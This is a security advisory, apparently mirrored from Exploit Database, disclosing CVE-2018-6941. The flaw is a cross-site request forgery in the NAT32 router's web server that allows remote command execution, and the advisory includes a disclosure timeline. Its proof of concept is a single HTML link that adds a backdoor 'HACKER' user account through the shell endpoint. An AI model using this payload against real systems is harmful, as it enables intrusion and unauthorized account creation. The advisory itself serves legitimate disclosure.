NAT32 2.2 Build 22284 – Cross-Site Request Forgery

• Exploit Database
• 38 阅读

• 作者： hyp3rlinx
  日期： 2018-02-14
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/44034/

• [+] Credits: hyp3rlinx
  [+] Website: hyp3rlinx.altervista.org
  [+] Source:http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CSRF-CVE-2018-6941.txt
  [+] ISR: Apparition Security
  
  [-_-] D1rty0tis
  	
  
  Vendor:
  =============
  www.nat32.com
  
  
  Product:
  ===========
  NAT32 Build (22284)
  
  NAT32® is a versatile IP Router implemented as a WIN32 application.
  
  
  Vulnerability Type:
  ===================
  Remote Command Execution (CSRF)
  
  
  CVE Reference:
  ==============
  CVE-2018-6941
  
  
  Security Issue:
  ================
  CSRF issue exists in the HTTPD component of NAT32 v2.2 Build 22284 devices that can be exploited for Remote Code Execution.
  
  Remote attackers can potentially execute arbitrary System Commands due to a Cross Site Request Forgery, if an authenticated NAT32 user clicks a malicious link
  or visits an attacker controlled webpage as NAT32 performs no check for blind requests.
  
  Its also worth mentioning is NAT32 implements BASIC authentication which pass BASE64 Encoded credentials which can be easily revealed if sniffed on network.
  
  
  Exploit/POC:
  =============
  <a href="http://VICTIM-IP:8080/shell?cmd=exec+net%20user%20HACKER%20abc123%20/add">Backdoor clicker</a>
  
  
  
  Network Access:
  ===============
  Remote
  
  
  
  Severity:
  =========
  High
  
  
  
  Disclosure Timeline:
  =============================
  Vendor Notification: February 9, 2018
  Vendor acknowledgement: February 9, 2018
  Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : February 12, 2018
  www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily unavailable." : February 13, 2018
  February 14, 2018 : Public Disclosure
  
  
  
  [+] Disclaimer
  The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
  Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
  that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
  is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
  for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
  or exploits by the author or elsewhere. All content (c).